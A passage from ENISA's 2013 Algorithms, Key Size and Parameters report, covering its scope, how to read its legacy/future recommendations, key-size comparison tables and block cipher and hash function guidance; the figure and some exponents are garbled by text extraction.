SK Sakai–Kasahara (ID-based encryption)
SSH Secure Shell
SSL Secure Sockets Layer
UEA UMTS Encryption Algorithm
UF Universally Unforgeable
UIA UMTS Integrity Algorithm
UMAC Universal hashing based MAC
UMTS Universal Mobile Telecommunications System
WEP Wired Equivalent Privacy
WPA Wi-Fi Protected Access
XTS XEX Tweakable Block Cipher with Ciphertext Stealing
Page: 8
Algorithms, Key Size and Parameters Report – 2013 Recommendations
Chapter 1
Executive Summary
Recently published EC Regulations on the measures applicable to the notification of personal data
breaches [119] make reference to ENISA, as a consultative body, in the process of establishing a list
of appropriate cryptographic protective measures. Furthermore, in a previous study of ENISA [113],
addressing the use of cryptographic techniques in the EU, published in 2011 it had been noticed
that a large number of national bodies were referring to the ECRYPT and ECRYPT II “Yearly
Report on Algorithms and Key Lengths” [104–111]. As the ECRYPT Network of Excellence (NoE)
published the last report at the end of 2012, the need for continuation of this activity has been
acknowledged by ENISA in its work programme for 2013 [115].
This document collates a series of recommendations for algorithms, keysizes, and parameter
recommendations. It addresses the need for a minimum level of requirements for cryptography
across European Union (EU) Member States (MSs) in their effort to protect personal and sensitive
data of the citizens. The document tries to address the need for continuation of the reports published
by ECRYPT NoE and also the requirements for cryptographic protective measures applicable to
the notification of personal data breaches by providing a focused set of recommendations in an
easy to use form. This is the first report consisting of recomendations addressing cryptographic
algorithms, sizes and paramenters published by ENISA. The intention is to continue and extend
this activity in the following years.
It should be noted that this is a technical document addressed to decision makers, specialists
designing and implementing cryptographic solutions. This set of recommendations is complement-
ing another study [114] published by ENISA that provides an easy to read and understand context
for non-speciallized parties and which places the notions of information security in the context of
personal data protection framework.
In this document we focus on just two decisions which we feel are more crucial to users of
cryptography.
Firstly, whether a given primitive, scheme or protocol can be considered for use today if it is
already deployed. We refer to such use as legacy use within our document. Our first recommen-
Page: 9
Algorithms, Key Size and Parameters Report – 2013 Recommendations
dation is that if a scheme is not considered suitable for legacy use, or is only considered for such
use with certain caveats, then this should be taken as a strong recommendation that the primitive,
scheme or protocol be replaced as a matter of urgency.
Secondly, we consider the issue of whether a primitive, scheme, or protocol is suitable for
deployment in new or future systems. In some sense mechanisms which we consider useable for new
and future systems meet cryptographic requirements described in this document; they generally will
have proofs of security, will have key sizes equivalent to 128-bit symmetric security or more1, will
have no structural weaknesses, will have been well studied, will have been been standardized, and
will have a reasonably-sized existing user base. Thus the second recommendation is that decision
makers now make plans and preparations for the phasing out of what we term legacy mechanisms
over a period of say 5-10 years, and replacing them with systems we deem secure for future use.
The document also details a summary of some of the many cryptographic protocols in use.
This section is deliberately brief as there has been very little scientific analysis of cryptographic
protocols in the literature. It is hoped that by detailing some protocols in need of analysis the
research community will start to consider examining these in more detail.
This document does not consider any mechanisms which are currently only of academic interest.
In particular all the mechanisms we discuss have been standardized to some extent, and have either
been deployed, or are slated to be deployed, in real systems. This selection is a means of focusing the
document on mechanisms which will be of interest to decision makers in industry and government.
As another restriction of scope, we do not consider issues related to implementation (e.g. side
channels resulting from timing, power, cache analysis, etc), nor issues arising from poor randomness
generation.
Further limitations of scope are mentioned in the introductory chapter which follows. Further
restrictions are mentined in Chapter 2 “How to Read this Document”. Such topics, which are not
explored by this document, could however be covered in the future.
1See Section 3.6 for the equivalence mapping between symmetric key sizes and public key sizes
Page: 10
Algorithms, Key Size and Parameters Report – 2013 Recommendations
Chapter 2
How to Read this Document
This document collates a series of recommendations for algorithm, keysize and protocol recommen-
dations. In some sense the current document supersedes the ECRYPT and ECRYPT2 “Yearly
Report on Algorithms and Key Lengths” published between 2004 and 2012 [104–111]. However, it
should be considered as completely distinct. The current document tries to provide a focused set
of recommendations in an easy to use form, the prior ECRYPT documents provided more general
background information and discussions on general concepts re key size choice, and tried to predict
the future ability of cryptanalytic attacks via hardware and software.
In this document we focus on just two decisions which we feel are more crucial to users of
cryptography. Firstly, whether a given primitive, scheme, protocol or keysize can be considered for
use today if it is already deployed. We refer to such use as legacy use within our document. If
a scheme is notconsidered suitable for legacy use, or is only considered for such use with certain
caveats, then this should be taken as a strong recommendation that the primitive, scheme or
protocol be possibly replaced as a matter of urgency (or even that an attack exists). Some of the
caveats which may mean a system which it not considered suitable for legacy use may still be secure
could be use of limited key lifetimes within a system, mitigating controls, or (in the case of hash
functions) relieing on non-collision resistance properties.
In particular, we stress, that schemes deemed to be legacy are considered to be secure currently.
But, that for future systems there are better choices available which means that retaining systems
which we deem to be legacy in future systems is not best practice. We summarize this distinction
in Table 2.1.
Secondly, we consider the issue of whether a primitive, scheme, protocol, or key size is suitable
for deployment in new or future systems. In some sense mechanisms which we consider usable for
new and future systems meet a gold standard of cryptographic strength; they generally will have
proofs of security, will have key sizes equivalent to 128-bits symmetric security or more, will have no
structural weaknesses, will have been well studied, been standardized and would have a reasonable
existing install base.
Page: 11
Algorithms, Key Size and Parameters Report – 2013 Recommendations
Classification Meaning
Legacy  Attack exists or security considered not sufficient.
Mechanism should be replaced in fielded products as a matter of urgency.
Legacy ✓ No known weaknesses at present.
Better alternatives exist.
Lack of security proof or limited key size.
Future ✓ Mechanism is well studied (often with security proof).
Expected to remain secure in 10-50 year lifetime.
Table 2.1: Summary of distinction between legacy and future use
As a general rule of thumb we consider symmetric 80-bit security levels to be sufficient for
legacy applications for the coming years, but consider 128-bit security levels to be the minimum
requirement for new systems being deployed. Thus the key recommendation is that decision makers
now make plans and preparations for the phasing out of what we term legacy mechanisms over a
period of say 5-10 years. In selecting key sizes for future applications we consider 128-bit to be
sufficient for all but the most sensitive applications. Thus we make no distinction between high-
grade security and low-grade security, since 128-bit encryption is probably secure enough in the
near term.
However, one needs to also take into account the length of time data needs to be kept secure
for. For example it may well be appropriate to use 80-bit encryption into the near future for
transactional data, i.e. data which only needs to be kept secret for a very short space of time; but
to insist on 128-bit encryption for long lived data. All recommendations in this document need to
be read with this in mind. We concentrate on recommendations which imply a minimal security
level across all applications; i.e. the most conservative approach. Thus this does not imply that a
specific application may enable lower security levels than that considered here.
The document does not consider any mechanisms which are currently only of academic interest.
In particular all the mechanisms we discuss have been standardized to some extent, and have either
been deployed or are due to be deployed in real world systems. This is not a critique of academic
research, but purely a means of focusing the document on mechanisms which will be of interest to
decision makers in industry and government.
As another restriction of scope we do not consider issues related to implementation (e.g. side
channels resulting from timing, power, cache analysis etc), nor insufficient randomness generation
[215]. However, we do consider implementation issues related to the mathematical instantiation
of the scheme, such as padding oracle attacks etc. If a particular mechanism option provides
a defense against side channel attacks (for example) we may mention it, but implementers are
strongly recommended to use all the standard implementation techniques to defend against such
attacks. In terms of randomness generation, almost all cryptographic mechanisms require access to
a sufficient entropy source. Whilst out of scope of this document, implementors are again strongly
Page: 12
Algorithms, Key Size and Parameters Report – 2013 Recommendations
recommended to ensure appropriate steps are taken to provide sufficient entropy to the mechanism.
As another restriction of scope, which we alluded to above, we do not make a comprehensive
discussion on how key size equivalents are decided upon (e.g. what RSA key size corresponds to
what AES key size). We refer to other comparisons in the literature in Section 3.1, but we feel
repeating much of this analysis would detract from the focus of this document.
2.1 Division into Chapters and Sections
The document divides cryptographic mechanisms into primitives (such as block ciphers, public key
primitive and hash functions), schemes (such as symmetric and public key encryption schemes,
signature schemes etc), and protocols (such as key agreement, TLS, IPsec etc). Protocols are built
out of schemes, and schemes are themselves built out of primitives. At each stage of this process
security needs to be defined, and the protocol or scheme needs to be proven to meet this definition,
given the components it uses. So for example, just because a scheme makes use of a secure primitive
does not imply the scheme is secure; this needs to be demonstrated by a proof. Luckily for most
schemes such proofs do exist. However, in the case of protocols very little work has been performed
in proving that deployed protocols meet a well defined security definition even when they are built
out of secure component primitives and schemes.
Primitive -Scheme-Protocol
Cryptographic primtives are considered the basic building blocks upon which one needs to make
some assumption . This assumption is the level of difficulty of breaking this precise building block;
this assumption is always the communities current “best guess”. We discuss primitives in detail in
Chapter 3.
In Chapter 4 we then go onto discuss schemes. By a scheme we mean some method for taking
a primitive, or set of primitives, and constructing a cryptographic service out of the primitive.
Hence, a scheme could refer to a digital signature scheme or a mode of operation of a block cipher.
It is considered good cryptographic practice to only use schemes for which there is a well defined
security proof which reduces the security of the scheme to that of the primitive. So for example an
attack against CBC mode using AES should result in an attack against the AES primitive itself.
Making the distinction between schemes and primitives also means we can present schemes as
general as possible and then allow users to instantiate them with secure primitives. However, this
leads to the question of what generally should the key size be for a primitive given, if is to be used
within a scheme? This might seem a simple question, but it is one which divides the cryptographic
community. There are two approaches to this problem:
1. Since a security proof which reduces security of a scheme to an underlying primitive can
Page: 13
Algorithms, Key Size and Parameters Report – 2013 Recommendations
introduce a security loss , some cryptographers state that the key size of the primitive should
be chosen with respect to this loss. With such a decision, unless proofs are tight1, the key
sizes used in practice will be larger than one would normally expect. The best one can hope
for is that the key size for the scheme matches that of the underlying primitive.
2. Another school of thought says that a proof is just a design validation, and the fact a tight
proof does not exist may not be for fundamental reasons but could be because our proof
techniques are not sufficiently advanced. They therefore suggest picking key sizes to just
ensure the underlying primitive is secure.
It is this second, pragmatic, approach which we adopt in this document. It is also the approach
commonly taken in industry.
The third type of cryptographic construction we examine is that of protocols (Chapter 5).
Whilst the design of primitives, and the analysis of schemes via provable security, has reached a
high level of sophistication; the analysis of protocols lags far behind. The academic literature does
contain analysis of quite complex protocols, but often these are designed from scratch to enable
efficient analysis. There is little analysis of existing protocols, in which a cryptographic analysis
needs to be performed after the design has been deployed or fixed. Indeed, many real world
protocols do not withstand such rigorous analysis and numerous weaknesses have been discovered
in real world protocols due to a lack of rigorous analysis before they were deployed. In an ideal
world design and analysis should be completed before deployment. However, in recent years a
number of researchers have started to examine how to do a post-hoc security analysis on already
defined protocols.
In the chapter on protocols we present, for a number of existing well known protocols, the
level of cryptographic security analysis which is known to have been performed. We restrict in
this section, purely for reasons of space, to those results of a cryptographic nature; for example
padding/error oracle attacks which we consider to be cryptographic design problems.
2.2 Making a Decision
The question then arises as to how to read this document? Whilst the order of the document is
one of going from the ground up, the actual order of making a decision should be from the top
down. We consider two hypothetical situations. One in which a user wishes to select a public key
signature algorithm and another in which he wishes to select a public key encryption algorithm
for use in a specific protocol. Let us not worry too much about which protocol is being used, but
assume that the protocol says that one can select either RSA-PSS or EC-Schnorr as the public key
signature algorithm, and either RSA-OAEP or ECIES as the public key encryption algorithm.
1i.e. there is no noticeable security loss in the proof
Page: 14
Algorithms, Key Size and Parameters Report – 2013 Recommendations
2.2.1 Public key signatures
We first examine the signature algorithm case. The reader should first turn to the section on
signature schemes in Section 4.8. The reader should examine the discussion of both RSA-PSS and
EC-Schnorr in Sections 4.8.2 and 4.8.7 respectively. One finds that both signature schemes are
considered suitable for legacy applications and future applications. However, for “systems” reasons
(probably the prevalence of RSA based digital certificates) the user decides to go for RSA-PSS.
The RSA-PSS scheme is actually made up of two primitives; firstly the RSA primitive (discussed in
Section 3.5.1) and secondly a hash function primitive (discussed in Section 3.3). Thus the user now
needs to consider “which” RSA primitive to use (i.e. the underlying RSA key size) and which hash
function to use. The scheme itself will impose some conditions on the relevant sizes so they match
up, but this need not concern a reader of this document in most cases. Returning to RSA-PSS
we see that the user should use 1024-bit RSA moduli only for legacy applications and SHA-1 as a
hash function only for legacy applications. If that is all the user requires then this document would
support the user’s decision. However, if the user is looking at creating a new system without any
legacy concerns then this document cannot be used as a justification for using RSA moduli of 1024
bits and SHA-1 as the hash function. The user would instead be forced to consider RSA moduli of
3024 bits (or more) and a hash function such as the 256-bit variant of SHA-2.
2.2.2 Public key encryption
We now turn to comparing the choice of RSA-OAEP and the ECIES hybrid cipher. By examining
Chapter 4 on schemes (in particular Section 4.6.2 for RSA-OAEP and Section 4.7 for ECIES) the
user sees that whilst both schemes have security proofs and so can be used for future applications,
ECIES is better suited to long messages. They therefore decide to proceed with ECIES, which
means certain choices need to be made with respect to the various components. The ECIES public
key encryption scheme, being a hybrid cipher, is made from the ECIES-KEM scheme (see Section
4.7.3), which itself makes use of a key derivation method (see Section 4.4 for various choices of key
derivation methods) and a Data Encapsulation Method, or DEM. A DEM is a form of one-time
authenticated symmetric encryption, see Section 4.3 for various possible instantiations. This creates
a huge range of possible instantiations, for which we now outline a possible decision process and
which we illustrate graphically in Figure 2.1. From examining Section 4.7.3 on ECIES-KEM and
Section 4.3 on authenticated symmetric encryption the user sees that ECIES-KEM is supported
for legacy and future use, and that so is Encrypt-Then-MAC as a DEM. Given these choices for
the components the user then needs to instantiate Encrypt-Then-MAC, which requires the choice
of an IND-CPA symmetric encryption scheme (i.e. a block cipher mode of operation from Section
4.1) and a MAC algorithm from Section 4.2. Looking at these sections the user then selects CTR
mode (for use with some block cipher), and CMAC (again for use with some block cipher). The
KEM also requires use of a key derivation function from Section 4.4, which will output a key for
the block cipher in CTR mode and a separate key for the CMAC algorithm. The user at this
Page: 15
Algorithms, Key Size and Parameters Report – 2013 Recommendations
point could select the key derivation function that we denote X9.63-KDF, which itself requires the
use of a hash function. Only at this point does the user of this document examine Chapter 3 on
primitives so as to instantiate the precise elliptic curve group, the precise hash function for use in
the key derivation function and the block ciphers to be used in the CTR mode encryption and the
CMAC function. At this point a valid choice (for future applications) could be a 256-bit elliptic
curve group, the SHA-2 key derivation function, and the AES block cipher at 128-bit key-length.
We stress that the above decision, on how to instantiate ECIES, is just one possible amongst
all the various methods which this document supports.
2.3 Comparison to Other Documents
This document is one of many which presents recommendations for cryptographic primitives, key
sizes and schemes. Each of these documents has a different audience and purpose; our goal has
been to present an analysis of algorithms commonly used in current practice as well as providing
state-of-the-art advice as to adoption of algorithms in future systems. Our recommendations are
often rather conservative since we aim to give recommendations for the constructions of systems
with a long live cycle.
As already remarked there is a strong relationship between this document and the ECRYPT
and ECRYPT2 reports [104–111]. As mentioned earlier the current document is focused on making
explicit recommendations as opposed to providing a general framework and summary as the original
ECRYPT documents did.
Various government organizations provide advice, see annex A of [113], or mandates, in relation
to key size and algorithm choice for their own internal purposes. In these documents, the choice of
algorithms and key sizes is often done with an eye to internal systems and processes. The current
document extends the scope to a wider area, e.g., internet communication and hence in addition
considers algorithms deployed in various internet protocols.
Among the EU member states, there are a number of such documents including [21] published
by France, and [66, 67] published by Germany. The key size recommendations of these three
documents are in almost all cases consistent with our own recommendations for symmetric key
sizes, hash function sizes and elliptic curve key sizes. The documents [66] and [21] also mention
integer factorization based primitives; the recommendations in [21] are consistent with our own,
whilst we are more conservative than [66] in this respect. Along with [21] we place a strong emphasis
on using schemes with modern security proofs.
Further afield the US government maintains a similar document called Suite B [251], which
presents recommended algorithms and key sizes for various govenmental uses. Again our recom-
mendations are broadly consistent in terms of key sizes with this document.
All of these documents [21,66,67,251] also detail a number of concrete cryptographic schemes.
In this aspect our coverage is much wider due to our wider audience. For example all documents
recommend the use of AES, SHA-2 and elliptic curve based primitves, and some integer factor-
Page: 16
Algorithms, Key Size and Parameters Report – 2013 Recommendations
ization based primitives. As well as these basic primitives we also mention a number of other
primitives which are used in various deployed protocols, for example Camellia (in TLS), SNOW
3G (in GSM/LTE), as well as primitives used in what we term legacy systems (e.g. MD5, SHA-1,
DES etc).
In terms of cryptographic schemes our coverage is much wider than that of [66,67,251]; this is
only to be expected as per our different audiences. As an example of this we cover a significant
number of MAC functions, authenticated encryption modes, and key derivation functions compared
to the other documents. In one aspect we diverge from [66,67,251] in that we recommend variants of
the DSA algorithm for use in legacy systems only. This is because DSA only has a security proof in
a relatively weak computational model [63]. For discrete logarithm based signatures we recommend
Schnorr signatures [313], which have stronger provable security properties than DSA [254,283].
Another form of comparison can be made with the documents of various standards organizations.
The ones which have been most referred to in this report are those of IETF, ISO and NIST.
Divergences from the recommendations (if any) in these standards are again due to the distinct
audiences. The IETF standardizes the protocols which keeps the internet running, their main
concern is hence interoperability. As we have seen in recent months, with attacks on TLS and IPSec,
this often leads to compromises in algorithm selection and choice. The ISO takes a very liberal
approach to standardizing cryptographic algorithms, with far more algorithms standardized than a
report like this could reasonably cover. We have selected algorithms from ISO (and dubbed them
suitable/unsuitable for legacy and future use) due to our perception of their importance in other
applications. Finally the NIST documents are more focused, with only a small subset of schemes
being standardized. A major benefit in the NIST standardization is that when security proofs are
available they are alluded to, and so one can judge the scientific basis of the recommendations.
2.4 Open Issues and Areas Not Covered
Whilst the area of primitives and schemes has attracted considerable academic attention in the last
three decades, the same cannot be said of high level protocols. Whilst there are some academic
treatments of protocols (e.g. extensive work on key agreement), very few of the actual deployed
protocols make use of the design methodology introduced in the academic treatments. Thus for
protocols there is a wide divergence between cryptographic theory and cryptographic practice. We
give an overview of some (well used) protocols in this document which have had some limited
analysis. A number of researchers are now trying to bridge this divide with considerable progress
having been made in the last few years; but more work needs to be urgently done in this area.
Mainy of the recommendations in this document are focused on long term data retention issues
(e.g. encrypted stored data, or long term signatures). Many cryptographic systems only need to
protect transient data (i.e. transactional data) which has no long term value. In such situations
some of the recommendations with respect to key size etc may need to be changed.
Due to time constraints there are also a number of areas which we have not touched upon in
Page: 17
Algorithms, Key Size and Parameters Report – 2013 Recommendations
this document. In terms of cryptographic schemes these contain, but are not limited to:
•Currently practical Post-Quantum Systems.
•Random number generation (e.g. physical generation) and extraction (via pseudo-random
number generators), e.g. as in FIPS 140-2 or NIST SP 800-90.
•Idenfitication and User Authentication Protocols, e.g. as in the various ISO 9798 standards.
•Key-wrap algorithms, e.g. as in ANSI X9.102 or NIST SP 800-38F.
•Key life cycle management, e.g. as in NIST SP 800-130 and 800-132,
•Password based key derivation, e.g. as in NIST SP 800-132.
•Password based key agreement protocols, e.g. EKE, PAK, SPEKE and J-PAKE.
It is hoped that if this document were to be revised in future years that the opportunity would be
taken to also include the afore mentioned mechanisms.
Page: 18
Algorithms, Key Size and Parameters Report – 2013 Recommendations
ECIES
PPPPPPPPP q )
ECIES-KEM
 
 
 
  	A
A
A
A
A UDEMc 9 ) 
 
  	A
A
AA UQQQQQ sHHHHHHH j
ECDLP Sizec
?QQQQ s
256-bits 512-bitsKDFc


 
?C
C
C
C
C
C
C
C
C
C
C
C
C
CWB
B
B
B
B
B
B
B
B
B
B
B
B
B
BBNOCB
?
?
?CCM
?
?
?Encrypt-then-MAC


 QQQQQQQQ sEAX
?
?
?CWC
?
?
?GCM
?
?
?
MAC Functionc


A
A
A
A
A
A U@
@
@
@
@
@ RIND-CPA Encryptionc


B
B
B
B
B
BBN
HMAC
?EMAC
A
A
A
A
A
A
A
A UCMAC
C
C
C
C
C
C
C
CWCTR mode


 CBC mode
 
 
 
 
 
 
 
  	X9.63-KDF
NIST-800-108-KDF
NIST-800-56-KDF-A/B
NIST-800-56-KDF-C-
Hash Functionc ?HHHHHH j
SHA-256 SHA-512 SHA-3Block Cipherc ?HHHHHH j
AES-128 AES-192 AES-256
Figure 2.1: Just some of the design space for instantiating the ECIES public key encryption algorithm.
Note, that not all standards documents will support all of these options. To read this diagram: A group
of arrows starting with a circle implies the implementer needs to choose one of the resulting paths. A set
of three arrows implies a part of the decision tree which we have removed due to space. In addition (again
for reasons of space) we do not list all possible choices. Even with these restrictions one can see the design
space for a cipher as well studied and understood as ECIES can be quite complex.
Page: 19
Algorithms, Key Size and Parameters Report – 2013 Recommendations
Chapter 3
Primitives
This chapter is about basic cryptographic building blocks, the atoms out of which all other crypto-
graphic constructions are produced. In this section we include basic symmetric key building blocks,
such as block ciphers, hash functions and stream ciphers; as well as basic public key building blocks
such as factoring, discrete logarithms and pairings. With each of these building blocks there is some
mathematical hard problem underlying the primitive. For example the RSA primitive is based on
the difficulty of factoring, the AES primitive is (usually) based on it representing a keyed pseudo-
random permutation. That these problems are hard, or equivalently, the primitives are secure is
an assumption which needs to be made. This assumption is often based on the specific parameters,
or key lengths, used to instantiate the primitives.
Modern cryptography then takes these building blocks/primitives and produces cryptographic
schemes out of them. The defacto methodology, in modern work, is to then show that the result-
ing scheme, when attacked in a specific cryptographic model, is secure assuming the underlying
assumption on the primitive holds. So another way of looking at this chapter and the next, is that
this chapter presents the constructions for which we cannot prove anything rigorously, whereas
the next chapter presents the schemes which should have proofs relative to the primitives in this
chapter actually being secure.
In each section we use the term observation to point out something which may point to a longer
term weakness, or is purely of academic interest, but which is not a practical attack at the time of
writing. In each section we also give a table, and group the schemes within the table in order of
security recommendations (usually).
3.1 Comparison
In making a decision as to which cryptographic mechanism to employ, one first needs to decide the
mechanism and then decide the key length to be used. In later sections and chapters we focus on
the mechanism choice, whereas in this section we focus just on the key size. In some schemes the
Page: 20
Algorithms, Key Size and Parameters Report – 2013 Recommendations
effective key length is hardwired into the mechanism, in others it is a parameter to be chosen, in
some there are multiple parameters which affect the effective key length.
There is common understanding that what we mean by an effective key length is that an attack
should take 2koperations for an effective key length of k. Of course this understanding is itself not
well defined as we have not defined what an operation is; but as a rule of thumb it should be the
“basic” operation of the mechanism. This lack of definition of what is meant by an operation means
that it is hard to compare one mechanism against another. For example the best attack against a
block cipher of key length kbshould be equivalent to 2kbblock cipher invocations, whereas the best
known attack against an elliptic curve system with group order of kebits should be 2ke/2elliptic
curve group operations. This often leads one to conclude that one should take ke= 2·kb, but this
assumes that a block cipher call is about the same cost as an elliptic curve group operation (which
may be true on one machine, but not true on another).
This has led authors and standards bodies to conduct a series of studies as to how key sizes
should be compared across various mechanisms. The “standard” method is to equate an effective
key size with a specific block cipher, (say 112 corresponds to two or three key Triple-DES, 128
corresponds to AES-128, 192 corresponds to AES-192, and 256 corresponds to AES-256), and then
try to establish an estimate for another mechanisms key size which equates to this specific quanta
of effective key size.
In comparing the different literature one meets a major problem in that not all studies compare
the same base symmetric key sizes; or even do an explicit comparison. The website http://
www.keylength.com takes the various proposed models from the the literature and presents a
mechanism to produce such a concrete comparison. In Table 3.1 we present either the concrete
recommendations to be found in the literature, or the inferred recommendations presented on the
web site http://www.keylength.com .
We focus on the symmetric key size k, the RSA modulus size l(N) (which is also the size
of a finite field for DLP systems) and the discrete logarithm subgroup size l(q); all of which are
measured in bits. Of course these are just crude approximations and hide many relationships
between parameters which we discuss in future sections below. As one can see from the table the
main divergence in estimates is in the selection of the size l(N) of the RSA modulus.
As one can see, as the symmetric key size increases the size of the associated RSA moduli needs
to become prohibitively large. Ignoring such large value RSA moduli we see that there is surprising
agreement in the associated size of the discrete logarithm subgroup q, which we assume to be an
elliptic curve group order.
Our implicit assumption is that the above key sizes are for (essentially) single use applications.
As a key is used over and over again its security degrades, due to various time-memory tradeoffs.
There are often protocol and scheme level procedures to address this issue; for example salting in
password hashing. The same holds true in other situations, for example in [46], it is shown that
AES-128 has only 85-bit security if 243encryptions of an arbitrary fixed text under different keys
are available to the attacker.
Very little literature discusses the equivalent block length for block ciphers or the output length
Page: 21
Algorithms, Key Size and Parameters Report – 2013 Recommendations
k l (N)l(q)k l (N)l(q)k l (N)l(q)k l (N)l(q)k l (N)l(q)
Lenstra–Verheul 2000 [217] ⋆
80 1184 142 112 3808 200 128 5888 230 192 20160 350 256 46752 474
Lenstra 2004 [214] ⋆
80 1329 160 112 3154 224 128 4440 256 192 12548 384 256 26268 512
IETF 2004 [270] ⋆
80 1233 148 112 2448 210 128 3253 242 192 7976 367 256 15489 494
SECG 2009 [314]
80 1024 160 112 2048 224 128 3072 256 192 7680 384 256 15360 512
NIST 2012 [265]
80 1024 160 112 2048 224 128 3072 256 192 7680 384 256 15360 512
ECRYPT2 2012 [107]
80 1248 160 112 2432 224 128 3248 256 192 7936 384 256 15424 512
Table 3.1: Key Size Comparisons in Literature. An entry marked with a ⋆indicates an inferred
comparison induced from the web site http://www.keylength.com . Where a range is given by the
source we present the minimum values. In the columns kis the symmetric key size, l(N) is the
RSA modulus size (or finite field size for finite field discrete logarithms) and l(q) is the subgroup
size for finite field and elliptic curve discrete logarithms.
of hash functions or MAC functions; since this is very much scheme/protocol specific. A good rule
of thumb for hash function outputs is that they should correspond in length to 2 ·k, since often hash
functions need to be collision resistant. However, if only preimage or second-preimage resistance is
needed then output sizes of kcan be tolerated.
The standard [262] implicitly recommends that the MAC key and and MAC output size should
be equal to the underlying symmetric key size k. However, the work of Preneel and van Oorschot
[287,288], implies attacks on MAC functions requiring 2n/2operations, where nis the key size, or
the size of the MAC functions internal memory. These recommendations can be problematic with
some MAC function constructions based on block ciphers at high security levels, as no major block
cipher has block length of 256 bits. In addition one needs to distinguish between off-line attacks,
in which a large MAC output size is probably justified, and an on-line attack, where smaller MAC
output sizes can be tolerated. Thus choice of the MAC output size can be very much scheme,
protocol, or even system, dependent.
3.2 Block Ciphers
By a block cipher we mean (essentially) a keyed pseudo-random permutation on a block of data of
a given length. A block cipher is notan encryption scheme, it is a component (in our terminology
primitive ) which goes into making such a scheme; often this is done via a mode of operation. In this
section we consider whether a given block cipher construction is secure, in the sense that it seems
to act like a pseudo-random permutation. Such a security consideration can never be proven, it
Page: 22
Algorithms, Key Size and Parameters Report – 2013 Recommendations
is a mathematical assumption, akin to the statement that factoring 3024-bit moduli is hard. The
schemes we present in Chapter 4, that use block ciphers, are often built on the assumption that
the block cipher is secure in the above sense.
Generally speaking we feel the minimum key size for a block cipher should be 128 bits; the
minimum for the block size depends on the precise application but in many applications (for example
construction of MAC functions) a 128-bit block size should now be considered the minimum in many
application. We also consider that the maximum amount of data which should be encrypted under
the same key should be bounded by 2n/2, where nis the block size in bits. However, as indicated
before some short lived cryptograms may warrant smaller block and key sizes in their constructions;
but for general applications we recommend a minimum of 128 bits.
Again, for each primitive we give a short description of state of the art with respect to known
attacks, we then give recommendations for minimum parameter sizes for future and legacy use. For
convenience these recommendations are summarized in Table 3.2.
Recommendation
Primitive Legacy Future
AES ✓ ✓
Camellia ✓ ✓
Three-Key-3DES ✓ 
Two-Key-3DES ✓ 
Kasumi ✓ 
Blowfish≥80-bit keys✓ 
DES  
Table 3.2: Block Cipher Summary
3.2.1 Recommended Block Ciphers
AES
The Advanced Encryption Standard, or AES, is the block cipher of choice for future applications
[88,120]. AES is called 128-EIA 2 in LTE. The AES has a block length of 128 bits and supports 3
key lengths: 128, 192 and 256 bits. The versions with longer key lengths use more rounds and are
hence slower (by 20, respectively 40%).
Observation: The strong algebraic structure of the AES cipher has led some researchers to suggest
that it might be susceptible to algebraic attacks [86, 249]. However, such attacks have not been
shown to be effective [76,220].
For the 192- and 256-bit key versions there are related key attacks [44, 45]. For AES-256 this
attack, using four related keys, requires time 299.5and data complexity 299.5. The attack works
Page: 23
Algorithms, Key Size and Parameters Report – 2013 Recommendations
due to the way the key schedule is implemented for the 192- and 256-bit keys (due to the mismatch
in block and key size), and does not affect the security of the 128-bit variant. Related key attacks
can clearly be avoided by always selecting cryptographic keys independently at random.
A bi-clique technique can be applied to the cipher to reduce the complexity of exhaustive
key search. For example in [53] it is shown that one can break AES-128 with 2126.2encryption
operations and 288chosen plaintexts. For AES-192 and AES-256 these numbers become 2189.7/240
and 2254.4/280respectively.
Camellia
The Camellia block cipher is used as one of the possible cipher suites in TLS, and unlike AES is of
a Feistel cipher design. Camellia has a block length of 128 bits and supports 3 key lengths: 128,
192 and 256 bits [228]. The versions with a 192- or a 256-bit key are 33% slower than the versions
with a 128-bit key.
Observation: Just as for AES there is a relatively simple set of algebraic equations which define
the Camellia transform; this might leave it open to algebraic attacks. However, just like AES such
attacks have not been shown to be effective.
3.2.2 Legacy Block Ciphers
3DES
Comes in two variants; a two key version with a 112-bit key and a three key version with a 168-bit
key [266]. The effective key length of three key 3DES is 112 bits and not 168 bits as one would
expect. The small block length (64-bits) is a problem in some applications. The two key variant
suffers from a (theoretical) related key attack, however if the two keys are selected uniformly at
random this is not a problem in practice.
Observation: Due to the iterated nature of the cipher the security is not as strong as the key
length would suggest. For the two key variant the security is 2120−twhere 2tplaintext/ciphertext
pairs are obtained; for the three key variant the security is reduced to 2112.
Kasumi
This cipher [118], used in 3GPP, has a 128-bit key and 64-bit block size is a variant of MIST-1.
Kasumi is called UIA1 in UMTS and is called A5/3 in GSM
Observation: Whilst some provable security against linear and differential cryptanalysis has been
established [188], the cipher suffers from a number of problems. A related key attack [41] requiring
276operations and 254plaintext/ciphertext pairs has been presented. In [98] a more efficient related
key attack is given which requires 232time and 226plaintext/ciphertext pairs. These attacks do
not affect the practical use of Kasumi in applications such as 3GPP, however given them we do not
recommend Kasumi for use in further applications.
Page: 24
Algorithms, Key Size and Parameters Report – 2013 Recommendations
Blowfish
This cipher [312] has a 64-bit block size, which is too small for some applications and the reason
we only recommend it for legacy use. It also has a key size ranging from 32- to 448-bits, which
we clearly only recommend using at 80-bits and above for legacy applications. The Blowfish block
cipher and is used in some IPsec configurations.
Observation: There have been a number of attacks on reduced round versions [189,293,334] but
no attacks on the full cipher.
3.2.3 Historical (not-recommended) Block Ciphers
DES
DES has a 56-bit key and 64-bit block size and so is not considered secure by today’s standards.
It is susceptible to linear [42] and differential cryptanalysis [229].
3.3 Hash Functions
Hash function outputs should be, in our opinion, a minimum of 160 bits in length for legacy
applications and 256 bits in length for all new applications. Hash functions are probably the
area of cryptography which has had the most attention in the past decade. This is due to the
spectacular improvements in the cryptanalysis of hash functions, as well as the subsequent SHA-3
competition to design a replacement for our existing set of functions. Most existing hash functions
are in the Merkle–Damg ̊ ard family, and derive much of their design philosophy from the MD-4
hash function; such hash fucntions are said to be in the MD-X family. This family includes MD-4,
MD-5, RIPEMD-128, RIPEMD-160, SHA-1 and SHA-2.
Output Recommendation
Primitive Lenfth Legacy Future
SHA-2 256, 384, 512 ✓ ✓
SHA-3 ? ✓ ✓
Whirlpool 512 ✓ ✓
SHA-2 224 ✓ 
RIPEMD-160 160 ✓ 
SHA-1 160 ✓ 
MD-5 128  
RIPEMD-128 128  
Table 3.3: Hash Function Summary
Page: 25
Algorithms, Key Size and Parameters Report – 2013 Recommendations
3.3.1 Recommended Hash Functions
SHA-2
SHA-2 is actually a family of four algorithms, SHA-224, SHA-256, SHA-384 and SHA-512. SHA-
